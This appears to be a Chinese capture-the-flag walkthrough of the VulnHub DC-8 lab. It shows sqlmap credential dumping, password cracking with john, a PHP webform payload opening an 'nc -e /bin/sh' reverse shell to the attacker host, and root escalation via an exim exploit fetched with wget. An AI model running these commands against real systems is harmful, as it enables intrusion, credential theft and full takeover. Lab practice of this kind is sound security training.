综合实战第二章
DC-8
环境准备
靶场下载:https://www.vulnhub.com/?page=2&q=dc
攻击机:
kali 192.168.3.134
win7 192.168.3.137
靶机:DC-8 192.168.3.170
信息搜集
nmap -p- -A 192.168.3.170

先看看80端口

用whatweb查看一下
whatweb http://192.168.3.170

看不出啥,继续在网页里找吧

可能存在sql注入
用sqlmap跑一下,出现库名
sqlmap -u "http://192.168.3.170/?nid=1" --dbs

表名
sqlmap -u "http://192.168.3.170/?nid=1" -D d7db --tables

列名
sqlmap -u "http://192.168.3.170/?nid=1" -D d7db -T users --columns

字段名
sqlmap -u "http://192.168.3.170/?nid=1" -D d7db -T users -C name,pass --dump

把账号和密码用:相连

破解用户名密码
john userpass

出来john的了
可以登录了,访问
http://192.168.3.170/user/login

确实登录成功
上传木马
既然已经进入了,就随便找找

在webform这里发现可以上传php

构造语句
<?php
system("nc -e /bin/sh 192.168.3.134 1234");
?>

然后nc连接
nc -lvvp 1234
在view里执行

连接成功

提权
老规矩,先美化
python -c 'import pty;pty.spawn("/bin/bash")'
看一下哪些东西是root权限
find / -perm -u=s -type f 2>/dev/null

有个exim4
查看exim4的版本
/usr/sbin/exim4 --version

根据版本查找漏洞
searchsploit exim

我们用46996
先拷贝到本地
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh
然后打开httpserver
python -m SimpleHTTPServer
然后在nc里面下载
wget http://192.168.3.134:8000/46996.sh

加权限
chmod 777 46996.sh
运行
./46996.sh -m netcat
是root权限了

拿到flag

结束!!